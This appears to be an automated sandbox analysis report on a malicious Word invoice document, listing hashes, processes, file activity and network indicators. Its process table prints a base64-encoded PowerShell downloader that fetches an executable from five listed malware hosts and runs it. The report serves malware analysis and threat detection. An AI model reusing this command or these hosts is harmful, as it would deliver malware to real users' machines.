File name: | INV13171.doc |
Full analysis: | https://app.any.run/tasks/bdda46eb-c287-42cc-877b-e4e577ce9e24 |
Verdict: | Malicious activity |
Analysis date: | February 19, 2019, 14:32:34 |
OS: | Windows 7 Professional Service Pack 1 (build: 7601, 32 bit) |
Tags: | |
Indicators: | |
MIME: | application/msword |
File info: | Composite Document File V2 Document, Little Endian, Os: Windows, Version 6.1, Code page: 1252, Template: Normal.dotm, Revision Number: 1, Name of Creating Application: Microsoft Office Word, Create Time/Date: Tue Feb 19 14:00:00 2019, Last Saved Time/Date: Tue Feb 19 14:00:00 2019, Number of Pages: 1, Number of Words: 1, Number of Characters: 7, Security: 0 |
MD5: | A63F571E46A998546B6DE552A86CDFD5 |
SHA1: | 40134A9A690919502216583E820F8AF53FEBE77A |
SHA256: | 155D73F72761BF45FD3FEB01CC13ACB0CC8BE30EFB5377006B95099024F11A6E |
SSDEEP: | 6144:jG5/BnVfRFJ7KK9aHScdX9znGUKEcx3F9k2phNy0QC:j2n9R/lA5dX9znGUY3Y2pjzQC |
.doc | | | Microsoft Word document (54.2) |
---|---|---|
.doc | | | Microsoft Word document (old ver.) (32.2) |
CompObjUserType: | Microsoft Word 97-2003 Document |
---|---|
CompObjUserTypeLen: | 32 |
HeadingPairs: |
|
TitleOfParts: | - |
HyperlinksChanged: | No |
SharedDoc: | No |
LinksUpToDate: | No |
ScaleCrop: | No |
AppVersion: | 16 |
CharCountWithSpaces: | 7 |
Paragraphs: | 1 |
Lines: | 1 |
Company: | - |
CodePage: | Windows Latin 1 (Western European) |
Security: | None |
Characters: | 7 |
Words: | 1 |
Pages: | 1 |
ModifyDate: | 2019:02:19 14:00:00 |
CreateDate: | 2019:02:19 14:00:00 |
TotalEditTime: | - |
Software: | Microsoft Office Word |
RevisionNumber: | 1 |
LastModifiedBy: | - |
Template: | Normal.dotm |
Comments: | - |
Keywords: | - |
Author: | - |
Subject: | - |
Title: | - |
PID | CMD | Path | Indicators | Parent process |
---|---|---|---|---|
3112 | "C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\admin\Desktop\INV13171.doc" | C:\Program Files\Microsoft Office\Office14\WINWORD.EXE | — | explorer.exe |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Microsoft Word Version: 14.0.6024.1000 | ||||
2412 | powersheLl -e JABOADcAMgAwADEAXwA9ACgAJwBjADcANwAnACsAJwBfADcAOQAnACkAOwAkAGkAOQA1AF8AMQA5ADgAXwA9AG4AZQB3AC0AbwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ADsAJABpADUAMwA4ADEAMgAyADgAPQAoACcAaAAnACsAJwB0ACcAKwAnAHQAcAA6AC8ALwAzACcAKwAnADUAJwArACcALgAyADAANAAuADIAJwArACcANQAxACcAKwAnAC4AJwArACcAOQA0ACcAKwAnAC8AeABxAGgAJwArACcAdQBiAFIAJwArACcAWAAxAFAAaAAnACsAJwB1ADAAJwArACcAQABoACcAKwAnAHQAdABwADoALwAvAGYAbwBuAGQAdABvAG0AJwArACcAYQBmAG8AJwArACcAdQBuAGQALgAnACsAJwBvACcAKwAnAHIAZwAvAHcAJwArACcAdgB2AHcALwAnACsAJwB1AG4ASwBlAGkAJwArACcASABmAE0ANAAnACsAJwB5AHkAawBQAFQAQwAnACsAJwBuAFAAJwArACcAQABoAHQAdABwADoALwAvAHAAJwArACcAbwBzACcAKwAnAHQAdgAnACsAJwBpAHIAYQAnACsAJwBsACcAKwAnAGUALgBjAG8AbQAvADgAOABJAEkAeAA4ACcAKwAnAHQAJwArACcAcwBaAEMAJwArACcAaQBxAEIAQAAnACsAJwBoAHQAdABwADoAJwArACcALwAvAHMAYQBuAGEAaQB0ACcAKwAnAGcAcgAnACsAJwBvACcAKwAnAHUAcAAuAGkAJwArACcAcgAvAG4ARgA4AFgATgBtAFYANAAnACsAJwBqACcAKwAnAE4AJwArACcAdAAnACsAJwB0AEMAagBAAGgAdAB0AHAAJwArACcAOgAvACcAKwAnAC8AJwArACcAZQBkAHYAYQAnACsAJwBuAHQAYQAnACsAJwAuAGMAbwBtAC8AdwBwAC0AYwBvAG4AJwArACcAdABlAG4AdAAvAHIARABhACcAKwAnAE8AJwArACcAdQB0AHEAUABUADgAYQAnACkALgBTAHAAbABpAHQAKAAnAEAAJwApADsAJABBADAAOQBfADcAOQA3AD0AKAAnAEEAMQAnACsAJwAzACcAKwAnADMAXwBfADYAXwAnACkAOwAkAEYANQAyAF8ANQBfACAAPQAgACgAJwA1ADkAJwArACcANgAnACkAOwAkAHQAXwA1ADIANAAyADMAPQAoACcAUgA5ADcAJwArACcAMwAnACsAJwA4AF8AMAAnACkAOwAkAEUAMwAzADAAXwAyAD0AJABlAG4AdgA6AHUAcwBlAHIAcAByAG8AZgBpAGwAZQArACcAXAAnACsAJABGADUAMgBfADUAXwArACgAJwAuAGUAeAAnACsAJwBlACcAKQA7AGYAbwByAGUAYQBjAGgAKAAkAE0AMwBfAF8ANQBfAF8AIABpAG4AIAAkAGkANQAzADgAMQAyADIAOAApAHsAdAByAHkAewAkAGkAOQA1AF8AMQA5ADgAXwAuAEQAbwB3AG4AbABvAGEAZABGAGkAbABlACgAJABNADMAXwBfADUAXwBfACwAIAAkAEUAMwAzADAAXwAyACkAOwAkAG0AMAAxADAAXwAxAD0AKAAnAHEAXwA4ADEAMgAnACsAJwBfADkAJwArACcAXwAnACkAOwBJAGYAIAAoACgARwBlAHQALQBJAHQAZQBtACAAJABFADMAMwAwAF8AMgApAC4AbABlAG4AZwB0AGgAIAAtAGcAZQAgADQAMAAwADAAMAApACAAewBJAG4AdgBvAGsAZQAtAEkAdABlAG0AIAAkAEUAMwAzADAAXwAyADsAJABTADcAOQA1ADcAMgA9ACgAJwBTADgAMQAwAF8AJwArACcANQA0ACcAKQA7AGIAcgBlAGEAawA7AH0AfQBjAGEAdABjAGgAewB9AH0AJABUADUANABfADUAMgA5ADUAPQAoACcAagAnACsAJwA0AF8AXwAnACsAJwA1AF8AOQA1ACcAKQA7AA== | C:\Windows\System32\WindowsPowerShell\v1.0\powersheLl.exe | wmiprvse.exe | |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows PowerShell Exit code: 0 Version: 6.1.7600.16385 (win7_rtm.090713-1255) |
PID | Process | Filename | Type | |
---|---|---|---|---|
3112 | WINWORD.EXE | C:\Users\admin\AppData\Local\Temp\CVRE8CE.tmp.cvr | — | |
MD5:— | SHA256:— | |||
2412 | powersheLl.exe | C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\67MCJASCHOREG7LFFXWZ.temp | — | |
MD5:— | SHA256:— | |||
3112 | WINWORD.EXE | C:\Users\admin\AppData\Roaming\Microsoft\Office\Recent\INV13171.doc.LNK | lnk | |
MD5:28DF77DDEF2D6B86CEFC5B4C2DA8344E | SHA256:CF261CF53F0081D50528E70681D737DA20B16FFF8D1C65E660523AD79A1C3093 | |||
3112 | WINWORD.EXE | C:\Users\admin\Desktop\~$V13171.doc | pgc | |
MD5:2633BB28B7A933AF1ACA833699B6CF26 | SHA256:C35BF8BB266DD67F1F2B1BDF9F303A26BD021584B817E629FC27265A17445862 | |||
3112 | WINWORD.EXE | C:\Users\admin\AppData\Roaming\Microsoft\Templates\~$Normal.dotm | pgc | |
MD5:DB3525D5287A61A2AB7E66655AD578B5 | SHA256:AE4C1A8E756D4CCD3F684DBD498E2419E36D392D6FE521F618A8A5D0672D5404 | |||
2412 | powersheLl.exe | C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms~RF20f5ce.TMP | binary | |
MD5:2BCAD5DA21CB41B727ABDE7D6B6990B8 | SHA256:AB1397E3A31059329829AE2164787589945B1459ED2E1B7328E86ED497A6F9F3 | |||
2412 | powersheLl.exe | C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms | binary | |
MD5:2BCAD5DA21CB41B727ABDE7D6B6990B8 | SHA256:AB1397E3A31059329829AE2164787589945B1459ED2E1B7328E86ED497A6F9F3 | |||
3112 | WINWORD.EXE | C:\Users\admin\AppData\Roaming\Microsoft\Office\Recent\index.dat | text | |
MD5:FBE17A01B08BD3E04E95C9C82E1053D9 | SHA256:7E644A6DD91B68671B39B2D32B5B0C8DEA15F14DC96077AC0C934161E3023FAD |
PID | Process | Method | HTTP Code | IP | URL | CN | Type | Size | Reputation |
---|---|---|---|---|---|---|---|---|---|
2412 | powersheLl.exe | GET | 404 | 35.204.251.94:80 | http://35.204.251.94/xqhubRX1Phu0 | US | xml | 345 b | suspicious |
2412 | powersheLl.exe | GET | 404 | 76.10.144.74:80 | http://fondtomafound.org/wvvw/unKeiHfM4yykPTCnP | CA | xml | 345 b | malicious |
2412 | powersheLl.exe | GET | 404 | 136.243.28.31:80 | http://postvirale.com/88IIx8tsZCiqB | DE | xml | 345 b | unknown |
2412 | powersheLl.exe | GET | 404 | 192.81.128.67:80 | http://edvanta.com/wp-content/rDaOutqPT8a | US | xml | 345 b | suspicious |
2412 | powersheLl.exe | GET | 404 | 46.105.103.119:80 | http://sanaitgroup.ir/nF8XNmV4jNttCj | FR | xml | 345 b | unknown |
PID | Process | IP | Domain | ASN | CN | Reputation |
---|---|---|---|---|---|---|
2412 | powersheLl.exe | 136.243.28.31:80 | postvirale.com | Hetzner Online GmbH | DE | unknown |
2412 | powersheLl.exe | 35.204.251.94:80 | — | Google Inc. | US | suspicious |
2412 | powersheLl.exe | 76.10.144.74:80 | fondtomafound.org | TekSavvy Solutions, Inc. | CA | suspicious |
2412 | powersheLl.exe | 192.81.128.67:80 | edvanta.com | Linode, LLC | US | suspicious |
2412 | powersheLl.exe | 46.105.103.119:80 | sanaitgroup.ir | OVH SAS | FR | unknown |
Domain | IP | Reputation |
---|---|---|
fondtomafound.org |
| malicious |
postvirale.com |
| unknown |
sanaitgroup.ir |
| unknown |
edvanta.com |
| suspicious |